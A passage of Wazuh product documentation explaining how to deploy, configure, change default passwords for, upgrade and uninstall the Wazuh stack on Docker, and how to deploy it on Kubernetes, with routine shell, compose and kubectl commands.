  1. Clone the Wazuh Docker repository to your system:

    # git clone https://github.com/wazuh/wazuh-docker.git -b v5.0.0
    
  2. Navigate to the multi-node directory to execute all the following commands.

    # cd wazuh-docker/multi-node/
    
Certificate generation

You must provide certificates for each node to secure communication between them in the Wazuh stack. You have two alternatives:

  • Wazuh self-signed certificates

  • Your own certificates

You must use the wazuh-certs-generator Docker image to generate self-signed certificates for each node of the stack.

  1. Optional: Add the following to the generate-indexer-certs.yml file if your system uses a proxy. If not, skip this step. Replace <YOUR_PROXY_ADDRESS_OR_DNS> with your proxy information.

    # Wazuh App Copyright (C) 2017, Wazuh Inc. (License GPLv2)
    services:
      generator:
        image: wazuh/wazuh-certs-generator:0.0.4
        hostname: wazuh-certs-generator
        volumes:
          - ./config/wazuh_indexer_ssl_certs/:/certificates/
          - ./config/certs.yml:/config/certs.yml
        environment:
          - HTTP_PROXY=<YOUR_PROXY_ADDRESS_OR_DNS>
    
  2. Run the following command to generate the desired certificates:

    # docker compose -f generate-indexer-certs.yml run --rm generator
    

The generated certificates will be stored in the wazuh-docker/multi-node/config/wazuh_indexer_ssl_certs directory.

Deployment
  1. Start the Wazuh Docker deployment using the docker compose command:

    # docker compose up -d
    

Note

Docker does not dynamically reload the configuration. After changing a component's configuration, you need to restart the stack.

Accessing the Wazuh dashboard

After deploying the multi-node stack, you can access the Wazuh dashboard using your Docker host's IP address or localhost.

https://<DOCKER_HOST_IP>

Note

If you use a self-signed certificate, your browser will display a warning that it cannot verify the certificate's authenticity.

This is the default username and password to access the Wazuh dashboard:

  • Username: admin

  • Password: SecretPassword

Refer to the changing the default password of Wazuh users section to learn more about additional security.

Note

To determine when the Wazuh indexer is up, the Wazuh dashboard container uses curl to repeatedly send queries to the Wazuh indexer API (port 9200). You can expect to see several Failed to connect to Wazuh indexer port 9200 log messages or Wazuh dashboard server is not ready yet until the Wazuh indexer is started. Then the setup process continues normally. It takes about one minute for the Wazuh indexer to start up. You can find the default Wazuh indexer credentials in the docker-compose.yml file.

Wazuh agent

Running the Wazuh agent in a Docker container provides a lightweight option for integrations and for collecting logs via syslog, without installing the agent directly on a host. However, when deployed this way, the containerized agent cannot directly access or monitor the host system.

Deployment

Follow these steps to deploy the Wazuh agent using Docker.

  1. Clone the Wazuh Docker repository to your system:

    # git clone https://github.com/wazuh/wazuh-docker.git -b v5.0.0
    
  2. Navigate to the wazuh-docker/wazuh-agent/ directory within your repository:

    # cd wazuh-docker/wazuh-agent
    
  3. Edit the docker-compose.yml file. Replace <YOUR_WAZUH_MANAGER_IP> with the IP address of your Wazuh manager. Locate the environment section for the agent service and update it:

    # Wazuh App Copyright (C) 2017, Wazuh Inc. (License GPLv2)
    services:
      wazuh.agent:
        image: wazuh/wazuh-agent:5.0.0
        restart: always
        environment:
          - WAZUH_MANAGER_SERVER=<WAZUH_MANAGER_IP>
        volumes:
          - ./config/wazuh-agent-conf:/wazuh-config-mount/etc/ossec.conf
    
  4. Start the Wazuh agent deployment using docker compose:

    # docker compose up -d
    
  5. Verify from your Wazuh dashboard that the Wazuh agent deployment was successful and visible. Navigate to the Agent management > Summary, and you should see the Wazuh agent container active on your dashboard.

Changing the default password of Wazuh users

We recommend changing the default Wazuh user's password to improve security.

There are two types of users on Wazuh Docker environments:

Follow the steps below to change the password of these Wazuh users.

Note

Depending on your Wazuh Docker stack, you must run the commands from the wazuh-docker/single-node or wazuh-docker/multi-node directory.

Wazuh indexer user

The Wazuh indexer has the admin and kibanaserver users by default. You can access the Wazuh dashboard using either the admin or kibanaserver user credentials.

To change these credentials, you must:

Warning

  • You can only change one user's password at a time.

  • If you have custom users, add them to the config/wazuh_indexer/internal_users.yml file in the deployment model directory. Otherwise, executing this procedure deletes them.

Logging out of your Wazuh dashboard

You must log out of your Wazuh dashboard before starting the password change process. If you don't, persistent session cookies will cause errors when accessing Wazuh after changing user passwords.

Setting the new password in the Docker Compose file

Note

If your password contains the $ character, you must escape it by doubling it. For example, to set the password Secret$Password in the docker-compose.yml file, write it as Secret$$Password.

  1. Open the docker-compose.yml file. Change all occurrences of the old password with the new one. For example, for a single-node stack:

    ...
    services:
        wazuh.manager:
        ...
        environment:
            - INDEXER_URL=https://wazuh.indexer:9200
            - INDEXER_USERNAME=admin
            - INDEXER_PASSWORD=SecretPassword
            - FILEBEAT_SSL_VERIFICATION_MODE=full
            - SSL_CERTIFICATE_AUTHORITIES=/etc/ssl/root-ca.pem
            - SSL_CERTIFICATE=/etc/ssl/filebeat.pem
            - SSL_KEY=/etc/ssl/filebeat.key
            - API_USERNAME=wazuh-wui
            - API_PASSWORD=MyS3cr37P450r.*-
        ...
        wazuh.indexer:
        ...
        environment:
            - "OPENSEARCH_JAVA_OPTS=-Xms1024m -Xmx1024m"
        ...
        wazuh.dashboard:
        ...
        environment:
            - INDEXER_USERNAME=admin
            - INDEXER_PASSWORD=SecretPassword
            - WAZUH_API_URL=https://wazuh.manager
            - DASHBOARD_USERNAME=kibanaserver
            - DASHBOARD_PASSWORD=kibanaserver
            - API_USERNAME=wazuh-wui
            - API_PASSWORD=MyS3cr37P450r.*-
        ...
    
Setting a new hash

Follow the steps below to generate and set a new password hash for your Wazuh users.

  1. Stop the stack if it's running:

    # docker compose down
    
  2. Run this command to generate the hash for your new password:

    # docker run --rm -ti wazuh/wazuh-indexer:5.0.0 bash /usr/share/wazuh-indexer/plugins/opensearch-security/tools/hash.sh
    

    Once the container launches, input the new password and press Enter.

  3. Copy the generated hash.

  4. Open the config/wazuh_indexer/internal_users.yml file. Locate the block for the user whose password you want to change.

  5. Replace <NEW_HASH> with your hash values.

    ...
    
    admin:
      hash: "<NEW_HASH>"
      reserved: true
      backend_roles:
      - "admin"
      description: "Demo admin user"
    
    ...
    

    Save the changes.

Applying the changes

After updating docker-compose.yml file, restart the Wazuh Docker stack and reapply settings using the securityadmin.sh tool.

  1. Start the deployment stack.

    # docker compose up -d
    
  2. Run docker ps and note the name of the first Wazuh indexer container. For example, single-node-wazuh.indexer-1, or multi-node-wazuh1.indexer-1.

  3. Run docker exec -it <WAZUH_INDEXER_CONTAINER_NAME> bash to access the container. Replace <WAZUH_INDEXER_CONTAINER_NAME> with the Wazuh indexer container name. For example, use single-node-wazuh.indexer-1 for the single-node stack and multi-node-wazuh1.indexer-1 for the multi-node stack:

    # docker exec -it single-node-wazuh.indexer-1 bash
    
  4. Set the following variables:

    export INSTALLATION_DIR=/usr/share/wazuh-indexer
    export CONFIG_DIR=$INSTALLATION_DIR/config
    CACERT=$CONFIG_DIR/certs/root-ca.pem
    KEY=$CONFIG_DIR/certs/admin-key.pem
    CERT=$CONFIG_DIR/certs/admin.pem
    export JAVA_HOME=/usr/share/wazuh-indexer/jdk
    
  5. Wait for the Wazuh indexer to initialize properly. The waiting time can vary from one to five minutes. It depends on the size of the cluster, the assigned resources, and the network speed. Then, run the securityadmin.sh script to apply all changes.

    $ bash /usr/share/wazuh-indexer/plugins/opensearch-security/tools/securityadmin.sh -cd $CONFIG_DIR/opensearch-security/ -nhnv -cacert  $CACERT -cert $CERT -key $KEY -p 9200 -icl
    
  6. Exit the Wazuh indexer container. Refresh the Wazuh dashboard and log in with the new credentials.

Wazuh server API users

The wazuh-wui user is the default user for connecting to the Wazuh server API. Follow these steps to change the password.

Warning

The password for Wazuh server API users must be between 8 and 64 characters long and contain at least one uppercase and lowercase letter, number, and symbol. The Wazuh manager service will fail to start if these requirements are unmet.

  1. Open the config/wazuh_dashboard/wazuh.yml file and modify the value of the password parameter.

    ...
    hosts:
      - 1513629884013:
          url: "https://wazuh.manager"
          port: 55000
          username: wazuh-wui
    
         password: "MyS3cr37P450r.*-"
    
         run_as: false
    ...
    
  2. Open the docker-compose.yml file. Change all occurrences of the old password with the new one.

    ...
    services:
      wazuh.manager:
        ...
        environment:
          - INDEXER_URL=https://wazuh.indexer:9200
          - INDEXER_USERNAME=admin
          - INDEXER_PASSWORD=SecretPassword
          - FILEBEAT_SSL_VERIFICATION_MODE=full
          - SSL_CERTIFICATE_AUTHORITIES=/etc/ssl/root-ca.pem
          - SSL_CERTIFICATE=/etc/ssl/filebeat.pem
          - SSL_KEY=/etc/ssl/filebeat.key
          - API_USERNAME=wazuh-wui
         - API_PASSWORD=MyS3cr37P450r.*-
    
     ...
      wazuh.dashboard:
        ...
        environment:
          - INDEXER_USERNAME=admin
          - INDEXER_PASSWORD=SecretPassword
          - WAZUH_API_URL=https://wazuh.manager
          - DASHBOARD_USERNAME=kibanaserver
          - DASHBOARD_PASSWORD=kibanaserver
          - API_USERNAME=wazuh-wui
    
         - API_PASSWORD=MyS3cr37P450r.*-
    
     ...
    
  3. Recreate the Wazuh containers:

    # docker compose down
    # docker compose up -d
    

Refer to logging in to the Wazuh server API via the command line to learn more.

Building Docker images locally

You can modify and build Docker images for the Wazuh central components (manager, indexer, and dashboard) and the Wazuh agent.

  1. Clone the Wazuh Docker repository to your system:

    # git clone https://github.com/wazuh/wazuh-docker.git -b v5.0.0
    
  2. Navigate to the build-docker-images directory:

    # cd wazuh-docker/build-docker-images
    
  3. Run the build script:

    # ./build-images.sh
    

This process builds Docker images for all Wazuh components on your local system.

Wazuh Docker utilities

After deploying Wazuh with Docker, you can perform several tasks to manage and customize your installation. Wazuh components are deployed as separate containers built from their corresponding Docker image. You can access these containers using the service names defined in your docker-compose.yml file, which are specific to your deployment type.

Access to services and containers

This section explains how to interact with your Wazuh deployment by accessing service logs and shell instances of running containers.

  1. Access the Wazuh dashboard using the Docker host IP address.

  2. Enroll agents through the Wazuh agent Docker deployment or the standard Wazuh agent enrollment process. Use the Docker host address as the Wazuh manager address.

  3. List the containers in the directory where the Wazuh docker-compose.yml file is located:

    # docker compose ps
    
    NAME                            COMMAND                  SERVICE             STATUS              PORTS
    single-node-wazuh.dashboard-1   "/entrypoint.sh"         wazuh.dashboard     running             443/tcp, 0.0.0.0:443->5601/tcp
    single-node-wazuh.indexer-1     "/entrypoint.sh open…"   wazuh.indexer       running             0.0.0.0:9200->9200/tcp
    single-node-wazuh.manager-1     "/init"                  wazuh.manager       running             0.0.0.0:1514-1515->1514-1515/tcp, 0.0.0.0:514->514/udp, 0.0.0.0:55000->55000/tcp, 1516/tcp
    
  4. Run the command below from the directory where the docker-compose.yml file is located to open a shell inside the container:

    # docker compose exec <SERVICE> bash
    
Wazuh service data volumes

You can set Wazuh configuration and log files to exist outside their containers on the host system. This allows the files to persist after containers are removed, and you can provision custom configuration files to your containers.

Listing existing volumes

Run the following to see the persistent volumes on your Docker host:

# docker volume ls
DRIVER    VOLUME NAME
local     single-node_wazuh_api_configuration

You can also view these volumes in the volumes section directly from the docker-compose.yml file.

Adding a custom volume

You need multiple volumes to ensure persistence on the Wazuh server, Wazuh indexer, and Wazuh dashboard containers. Investigate the volumes section in your docker-compose.yml file and modify it to include your custom volumes:

services:
  wazuh.manager:
    . . .
    volumes:
      - wazuh_api_configuration:/var/ossec/api/configuration
    . . .
volumes:
  wazuh_api_configuration:
Custom commands and scripts

Run the command below to execute commands inside the containers. We use the Wazuh manager single-node-wazuh.manager-1 container in this example:

# docker exec -it single-node-wazuh.manager-1 bash

Every change made on this shell persists because of the data volumes.

Note

The actions you can perform inside the containers are limited.

Modifying the Wazuh configuration file

To customize the Wazuh configuration file /var/ossec/etc/ossec.conf, modify the appropriate configuration file on the Docker host according to your business needs. These local files are mounted into the containers at runtime, allowing your custom settings to persist across container restarts or rebuilds.

  1. Run the following command in your deployment directory to stop the running containers:

    # docker compose down
    
  2. The following are the locations of the Wazuh configuration files on the Docker host that you can modify:

    wazuh-docker/single-node/config/wazuh_cluster/wazuh_manager.conf

    Save the changes made in the configuration files.

  3. Restart the stack:

    # docker compose up -d
    

These files are mounted into the container at runtime (wazuh-config-mount/etc/ossec.conf), ensuring your changes take effect when the containers start.

Tuning Wazuh services

Tuning the Wazuh indexer and dashboard is optional. You can apply custom configurations only if you need to adjust performance, customize the dashboard interface, or override default settings.

  • The Wazuh indexer reads its configuration from the file(s) in the config/wazuh_indexer/ directory in your respective deployment stack. Edit the appropriate configuration file(s) with your desired parameters, and ensure any changes made are properly mapped in your docker-compose.yml so the container loads the updated configuration.

  • The Wazuh dashboard reads its configuration from the config/wazuh_dashboard/opensearch_dashboards.yml file. You can adjust dashboard behavior or appearance by modifying parameters in this file. Refer to the OpenSearch documentation on Modifying the YAML files for details about the available variables you can override in this configuration.

Upgrading Wazuh Docker

This section describes how to upgrade the Wazuh deployment on Docker.

To upgrade to version 5.0.0, choose one of the following strategies.

Using the default Docker Compose files

Follow these steps to upgrade your deployment using the default docker-compose.yml file:

  1. Run the following command from your wazuh-docker/single-node/ or wazuh-docker/multi-node/ directory to stop the outdated environment:

    # docker compose down
    
  2. Update your local repository to fetch the latest tags:

    # git fetch --all --tags
    
  3. Check out the tag for the current version of wazuh-docker:

    # git checkout v5.0.0
    

    This command switches your local repository to the specified release tag, ensuring the deployment uses that version's exact configuration and files.

    Note

    Replace v5.0.0 with the tag of any other Wazuh version you want to upgrade to. You can run git tag -l to see all available versions.

  4. Start the upgraded Wazuh Docker environment using the docker compose command:

    # docker compose up -d
    

    Your data and certificates remain persistent because they are stored in mounted Docker volumes. This means upgrading the environment does not erase your existing configuration or indexed data.

Keeping your custom Docker Compose files

To upgrade your deployment while preserving your custom docker-compose.yml file, follow these steps:

Single-node stack
  1. Run the following command from your wazuh-docker/single-node/ directory to stop the outdated environment:

    # docker compose down
    
  2. If upgrading from a version earlier than 4.8, edit the single-node/config/wazuh_dashboard/opensearch_dashboards.yml file and update the defaultRoute parameter as follows:

    uiSettings.overrides.defaultRoute: /app/wz-home
    

    Optional: Modify the OPENSEARCH_JAVA_OPTS environment variable in the single-node/docker-compose.yml file to allocate more RAM to the Wazuh indexer container.

    environment:
    - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g"
    
  3. In single-node/generate-indexer-certs.yml, update the image generator tag to the latest version and add the CERT_TOOL_VERSION environment variable.

    services:
       generator:
          image: wazuh/wazuh-certs-generator:0.0.4
          environment:
            - CERT_TOOL_VERSION=5.0
    
  4. Recreate the certificates after these changes.

    # docker compose -f generate-indexer-certs.yml run --rm generator
    

    Optional: Update old paths with the new ones based on the version you are upgrading from.

    Wazuh dashboard

    1. Edit single-node/config/wazuh_dashboard/opensearch_dashboards.yml and do the following replacements.

      • Replace /usr/share/wazuh-dashboard/config/certs/ with /usr/share/wazuh-dashboard/certs/.

    2. Edit single-node/docker-compose.yml and do the following replacements.

      • Replace /usr/share/wazuh-dashboard/config/certs/ with /usr/share/wazuh-dashboard/certs/.

    Wazuh indexer

    1. Edit the single-node/config/wazuh_indexer/wazuh.indexer.yml file and do the following replacements.

      • Replace ${OPENSEARCH_PATH_CONF}/certs/ with /usr/share/wazuh-indexer/config/certs/.

    2. Edit the single-node/docker-compose.yml file and do the following replacements.

      • Replace /usr/share/wazuh-indexer/plugins/opensearch-security/securityconfig/ with /usr/share/wazuh-indexer/opensearch-security/.

  5. Edit the docker-compose.yml file and update the highlighted lines to the latest images.

    wazuh.manager:
       image: wazuh/wazuh-manager:5.0.0
    ...
    wazuh.indexer:
       image: wazuh/wazuh-indexer:5.0.0
    ...
    wazuh.dashboard:
       image: wazuh/wazuh-dashboard:5.0.0
    

    Optional: If you are upgrading from Wazuh version 4.3, add the variable related to the kibanaserver user.

    ...
    wazuh.dashboard:
       image: wazuh/wazuh-dashboard:5.0.0
       environment:
          - INDEXER_USERNAME=admin
          - INDEXER_PASSWORD=SecretPassword
          - WAZUH_API_URL=https://wazuh.manager
          - DASHBOARD_USERNAME=kibanaserver
          - DASHBOARD_PASSWORD=kibanaserver
    
  6. Replace the content of single-node/config/wazuh_cluster/wazuh_manager.conf file in your stack with the one from the v5.0.0 tag of the Wazuh Docker repository.

    # curl -sL https://raw.githubusercontent.com/wazuh/wazuh-docker/v5.0.0/single-node/config/wazuh_cluster/wazuh_manager.conf > single-node/config/wazuh_cluster/wazuh_manager.conf
    
  7. Start the new version of Wazuh using the docker compose command:

    # docker compose up -d
    
Multi-node stack
  1. Run the following command from your wazuh-docker/multi-node/ directory to stop the outdated environment:

    # docker compose down
    
  2. If upgrading from a version earlier than 4.8, edit multi-node/config/wazuh_dashboard/opensearch_dashboards.yml file and update the defaultRoute parameter as follows:

    uiSettings.overrides.defaultRoute: /app/wz-home
    

    Optional: Modify the OPENSEARCH_JAVA_OPTS environment variable in the multi-node/docker-compose.yml file to allocate more RAM to the Wazuh indexer container.

    environment:
    - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g"
    
  3. In multi-node/generate-indexer-certs.yml, update the image generator tag to the latest version and add the CERT_TOOL_VERSION environment variable.

    services:
       generator:
          image: wazuh/wazuh-certs-generator:0.0.4
          environment:
            - CERT_TOOL_VERSION=5.0
    
  4. Recreate the certificates after these changes.

    # docker compose -f generate-indexer-certs.yml run --rm generator
    

    Optional: Update these old paths with the new ones based on the version you are upgrading from.

    Wazuh dashboard

    1. Edit multi-node/config/wazuh_dashboard/opensearch_dashboards.yml and do the following replacements.

      • Replace /usr/share/wazuh-dashboard/config/certs/ with /usr/share/wazuh-dashboard/certs/.

    2. Edit multi-node/docker-compose.yml and do the following replacements.

      • Replace /usr/share/wazuh-dashboard/config/certs/ with /usr/share/wazuh-dashboard/certs/.

    Wazuh indexer

    1. Edit the multi-node/config/wazuh_indexer/wazuh1.indexer.yml, multi-node/config/wazuh_indexer/wazuh2.indexer.yml, and multi-node/config/wazuh_indexer/wazuh3.indexer.yml files and do the following replacements.

      • Replace ${OPENSEARCH_PATH_CONF}/certs/ with /usr/share/wazuh-indexer/config/certs/.

    2. Edit the multi-node/docker-compose.yml file and do the following replacements.

      • Replace /usr/share/wazuh-indexer/plugins/opensearch-security/securityconfig/ with /usr/share/wazuh-indexer/opensearch-security/.

  5. Edit the docker-compose.yml file and update the highlighted lines to the latest images.

    wazuh.master:
       image: wazuh/wazuh-manager:5.0.0
    ...
    wazuh.worker:
       image: wazuh/wazuh-manager:5.0.0
    ...
    wazuh1.indexer:
       image: wazuh/wazuh-indexer:5.0.0
    ...
    wazuh2.indexer:
       image: wazuh/wazuh-indexer:5.0.0
    ...
    wazuh3.indexer:
       image: wazuh/wazuh-indexer:5.0.0
    ...
    wazuh.dashboard:
       image: wazuh/wazuh-dashboard:5.0.0
    

    Optional: If you are updating from Wazuh version 4.3, add the variable related to the kibanaserver user.

    ...
    wazuh.dashboard:
       image: wazuh/wazuh-dashboard:5.0.0
       environment:
          - OPENSEARCH_HOSTS="https://wazuh1.indexer:9200"
          - WAZUH_API_URL="https://wazuh.master"
          - API_USERNAME=wazuh-wui
          - API_PASSWORD=MyS3cr37P450r.*-
          - DASHBOARD_USERNAME=kibanaserver
          - DASHBOARD_PASSWORD=kibanaserver
    
  6. Replace the content of the following files in your stack with the ones from the v5.0.0 tag of the Wazuh Docker repository.

    • multi-node/config/wazuh_cluster/wazuh_manager.conf

      # curl -sL https://raw.githubusercontent.com/wazuh/wazuh-docker/v5.0.0/multi-node/config/wazuh_cluster/wazuh_manager.conf > multi-node/config/wazuh_cluster/wazuh_manager.conf
      
    • multi-node/config/wazuh_cluster/wazuh_worker.conf

      # curl -sL https://raw.githubusercontent.com/wazuh/wazuh-docker/v5.0.0/multi-node/config/wazuh_cluster/wazuh_worker.conf > multi-node/config/wazuh_cluster/wazuh_worker.conf
      
  7. Start the new version of Wazuh using the docker compose command:

    # docker compose up -d
    
Uninstalling the Wazuh Docker deployment

Follow these steps to uninstall your Wazuh Docker deployment from your Docker host:

  1. Navigate to the directory of your deployment model.

  2. Stop the stack:

    # docker compose down
    

    This command stops all running containers and removes them, but preserves your data volumes and configuration files.

  3. Optional: Delete persistent volumes.

    • List all volumes first to confirm what you want to delete:

      # docker volume ls
      
    • If you created custom volumes for logs, configuration, or data, remove them manually:

      # docker volume rm <VOLUME_ID>
      
    • Replace <VOLUME_ID> with the volume name(s) you want to delete.

  4. You can also perform steps 2 and 3 in a single command.

    Warning

    The -v flag will permanently delete all your Wazuh data, configurations, and logs. Use this only when you want to remove the deployment and start fresh completely.

    • Run the following to stop the stack and immediately remove all associated volumes:

      # docker compose down -v
      

Deployment on Kubernetes

In this section, we show the process of installing, upgrading, and uninstalling Wazuh on Kubernetes.

Kubernetes is an open source container orchestration engine. Containers are microservices packaged with their dependencies and configurations. Kubernetes is meant to run across a cluster, automating deployment, scaling, and management of containerized applications. It simplifies the operation of applications that span multiple containers deployed across multiple servers. For easy management and discovery, containers are grouped into pods, the basic operational unit for Kubernetes. Kubernetes pods are distributed among nodes to provide high availability. Kubernetes helps with networking, load balancing, security, and scaling across all Kubernetes nodes running your containers.

In this section of the documentation, we show how to clone the Wazuh Kubernetes repository, and set up SSL certificates. We also show how to apply the manifests and deploy the necessary pods and services for installing Wazuh on Kubernetes in the cloud and local environments. The other subsection in this documentation covers Kubernetes configuration, how to Upgrade Wazuh installed in Kubernetes, and how to Clean Up both clusters and volumes.

Kubernetes configuration

This section outlines how to configure Wazuh components within a Kubernetes cluster, including the manager, indexer, and dashboard. It describes the resource requirements, storage setup, and controller types used for each component.

Pre-requisites

Before you begin, ensure that the following requirements are met:

  • A running Kubernetes cluster.

  • An Amazon EBS CSI driver IAM role for Amazon EKS deployments using Kubernetes version 1.23 and later. The CSI driver requires that you assign an IAM role to work properly. For detailed instructions, refer to AWS documentation on Creating the Amazon EBS CSI driver IAM role. You need to install the CSI driver for both new and old deployments. The CSI driver is an essential Kubernetes feature.

Resource Requirement

Your cluster must have at least the following resources available:

  • 2 CPU units

  • 3 Gi of memory

  • 2 Gi of storage

Overview
StatefulSet and Deployment controllers

A StatefulSet manages pods based on identical container specifications. Unlike Deployments, StatefulSets maintain a persistent identity for each pod. Pods are created from the same specification, but are not interchangeable. Each pod retains a persistent identifier that survives rescheduling.

StatefulSets are useful for stateful applications like databases that save data to persistent storage. Wazuh manager and Wazuh indexer components maintain their states, so we use StatefulSets to ensure state persistence across Pod restarts.

Deployments are intended for stateless applications and are lightweight. The Wazuh dashboard doesn't need to maintain state, so it is deployed using a Deployment controller.

Persistent volumes (PV) are storage resources in the cluster. They have a lifecycle independent of any individual pod that uses them. This API object captures storage implementation details for NFS, iSCSI, or cloud-provider-specific storage systems.

We use persistent volumes to store data from both the Wazuh manager and the Wazuh indexer.

For more information, see the Kubernetes persistent volumes documentation.

Pods

A Pod is the smallest and most fundamental deployable unit in Kubernetes. It represents a single instance of a running process in your cluster. You can view how we build Wazuh Docker containers in our repository.

Wazuh master

The master pod contains the master node of the Wazuh server cluster. The master node centralizes and coordinates worker nodes. It ensures critical data remains consistent across the Wazuh server cluster. Management operations occur only on this node, so the agent enrollment service (authd) runs here.

Image

Controller

wazuh/wazuh-manager

StatefulSet

Wazuh worker

The Wazuh worker pods contain the worker nodes of the Wazuh server cluster. They receive agent events.

Image

Controller

wazuh/wazuh-manager

StatefulSet

Wazuh indexer

The Wazuh indexer pod ingests events received from Filebeat.

Image

Controller

wazuh/wazuh-indexer

StatefulSet

Wazuh dashboard

The Wazuh dashboard pod provides visualization of Wazuh indexer data, Wazuh agent information, and Wazuh server configuration.

Image

Controller

wazuh/wazuh-dashboard

Deployment

Services

Wazuh indexer and dashboard

Name

Description

wazuh-indexer

Communication for Wazuh indexer nodes.

indexer

This is the Wazuh indexer API used by the Wazuh dashboard to read/write alerts.

dashboard

Wazuh dashboard service. https://wazuh.<YOUR_DOMAIN>.com:443

Wazuh server

Name

Description

wazuh-master

Wazuh API: wazuh-master.<YOUR_DOMAIN>.com:55000

Agent registration service (authd): wazuh-master.<YOUR_DOMAIN>.com:1515

wazuh-workers

Reporting service: wazuh-manager.<YOUR_DOMAIN>.com:1514

wazuh-cluster

Communication for Wazuh manager nodes.

Deployment

This section covers deploying Wazuh on Kubernetes for Amazon EKS and Local Kubernetes clusters, from environment preparation to verifying that all components are running correctly.

Clone the Wazuh Kubernetes repository for the necessary services and pods:

$ git clone https://github.com/wazuh/wazuh-kubernetes.git -b v5.0.0 --depth=1
$ cd wazuh-kubernetes
Setup SSL certificates

Perform the steps below to generate the required certificates for the deployment:

  1. Generate self-signed certificates for the Wazuh indexer cluster using the script at wazuh/certs/indexer_cluster/generate_certs.sh or provide your own certificates.

    # wazuh/certs/indexer_cluster/generate_certs.sh
    
    Root CA
    Admin cert
    create: admin-key-temp.pem
    create: admin-key.pem
    create: admin.csr
    Ignoring -days without -x509; not generating a certificate
    create: admin.pem
    Certificate request self-signature ok
    subject=C=US, L=California, O=Company, CN=admin
    * Node cert
    create: node-key-temp.pem
    create: node-key.pem
    create: node.csr
    Ignoring -days without -x509; not generating a certificate
    create: node.pem
    Certificate request self-signature ok
    subject=C=US, L=California, O=Company, CN=indexer
    * dashboard cert
    create: dashboard-key-temp.pem
    create: dashboard-key.pem
    create: dashboard.csr
    Ignoring -days without -x509; not generating a certificate
    create: dashboard.pem
    Certificate request self-signature ok
    subject=C=US, L=California, O=Company, CN=dashboard
    * Filebeat cert
    create: filebeat-key-temp.pem
    create: filebeat-key.pem
    create: filebeat.csr
    Ignoring -days without -x509; not generating a certificate
    create: filebeat.pem
    Certificate request self-signature ok
    subject=C=US, L=California, O=Company, CN=filebeat
    
  2. Generate self-signed certificates for the Wazuh dashboard using the script at wazuh/certs/dashboard_http/generate_certs.sh or provide your own certificates.

    # wazuh/certs/dashboard_http/generate_certs.sh
    

    The required certificates are imported via secretGenerator in the kustomization.yml file:

    secretGenerator:
        - name: indexer-certs
          files:
            - certs/indexer_cluster/root-ca.pem
            - certs/indexer_cluster/node.pem
            - certs/indexer_cluster/node-key.pem
            - certs/indexer_cluster/dashboard.pem
            - certs/indexer_cluster/dashboard-key.pem
            - certs/indexer_cluster/admin.pem
            - certs/indexer_cluster/admin-key.pem
            - certs/indexer_cluster/filebeat.pem
            - certs/indexer_cluster/filebeat-key.pem
        - name: dashboard-certs
          files:
            - certs/dashboard_http/cert.pem
            - certs/dashboard_http/key.pem
            - certs/indexer_cluster/root-ca.pem
    
Setup storage class (optional for non-EKS cluster)

The storage class provisioner varies depending on your cluster. Edit the envs/local-env/storage-class.yaml file to set the provisioner that matches your cluster type.

Check your storage class by running kubectl get sc:

# kubectl get sc
NAME                          PROVISIONER            RECLAIMPOLICY   VOLUMEBINDINGMODE   ALLOWVOLUMEEXPANSION   AGE
elk-gp2                       microk8s.io/hostpath   Delete          Immediate           false                  67d
microk8s-hostpath (default)   microk8s.io/hostpath   Delete          Immediate           false                  54d

The provisioner column displays microk8s.io/hostpath.

Apply all manifests

There are two variants of the manifest: one for EKS clusters located in envs/eks and the second for other cluster types located in envs/local-env.

You can adjust cluster resources by editing patches in envs/eks/ or envs/local-env/. You can also tune CPU, memory, and storage for persistent volumes of each cluster object. Remove patches from kustomization.yml or modify patch values to undo changes.

Deploy the cluster using the kustomization.yml file:

  • EKS cluster

    # kubectl apply -k envs/eks/
    
  • Other cluster types

    # kubectl apply -k envs/local-env/
    
Verifying the deployment
Namespace

Run the following command to check that the Wazuh namespace is active:

$ kubectl get namespaces | grep wazuh
wazuh         Active    12m
Services

Run the command below to view all running services in the Wazuh namespace:

$ kubectl get services -n wazuh
NAME                  TYPE           CLUSTER-IP       EXTERNAL-IP        PORT(S)                          AGE
indexer               ClusterIP      xxx.yy.zzz.24    <none>             9200/TCP                         12m
dashboard             ClusterIP      xxx.yy.zzz.76    <none>             5601/TCP                         11m
wazuh                 LoadBalancer   xxx.yy.zzz.209   internal-a7a8...   1515:32623/TCP,55000:30283/TCP   9m
wazuh-cluster         ClusterIP      None             <none>             1516/TCP                         9m
Wazuh-indexer         ClusterIP      None             <none>             9300/TCP                         12m
wazuh-workers         LoadBalancer   xxx.yy.zzz.26    internal-a7f9...   1514:31593/TCP                   9m

Note

Take note of the External IP addresses for the wazuh and wazuh-workers services, as they are required during the Wazuh agent installation.

The wazuh External IP is used as the Wazuh Registration Server IP address (port 1515), while the wazuh-workers External IP is used as the Wazuh Manager IP address for event transmission (port 1514) after enrollment.

Deployments

Run the command below to check for the deployments in the Wazuh namespace:

$ kubectl get deployments -n wazuh
NAME             DESIRED   CURRENT   UP-TO-DATE   AVAILABLE   AGE
wazuh-dashboard  1         1         1            1           11m
Statefulset

Run the command below to check the active StatefulSets in the Wazuh namespace:

$ kubectl get statefulsets -n wazuh
NAME                   READY   AGE
wazuh-indexer          3/3     15m
wazuh-manager-master   1/1     15m
wazuh-manager-worker   2/2     15m
Pods

Run the command below to view the pods status in the Wazuh namespace:

$ kubectl get pods -n wazuh
NAME                              READY     STATUS    RESTARTS   AGE
wazuh-indexer-0                   1/1       Running   0          15m
wazuh-dashboard-f4d9c7944-httsd   1/1       Running   0          14m
wazuh-manager-master-0            1/1       Running   0          12m
wazuh-manager-worker-0-0          1/1       Running   0          11m
wazuh-manager-worker-1-0          1/1       Running   0          11m
Enrolling a Wazuh agent

Follow the steps below to enroll a Wazuh agent to a Wazuh manager running in a Kubernetes environment.

  1. Execute this command on the Kubernetes cluster and note the External IP of the wazuh and wazuh-workers load balancers:

    # kubectl get services -n wazuh
    
    NAME                  TYPE           CLUSTER-IP       EXTERNAL-IP        PORT(S)                          AGE
    indexer               ClusterIP      xxx.yy.zzz.24    <none>             9200/TCP                         12m
    dashboard             ClusterIP      xxx.yy.zzz.76    <none>             5601/TCP                         11m
    wazuh                 LoadBalancer   xxx.yy.zzz.209   internal-a7a8...   1515:32623/TCP,55000:30283/TCP   9m
    wazuh-cluster         ClusterIP      None             <none>             1516/TCP                         9m
    Wazuh-indexer         ClusterIP      None             <none>             9300/TCP                         12m
    wazuh-workers         LoadBalancer   xxx.yy.zzz.26    internal-a7f9...   1514:31593/TCP                   9m
    
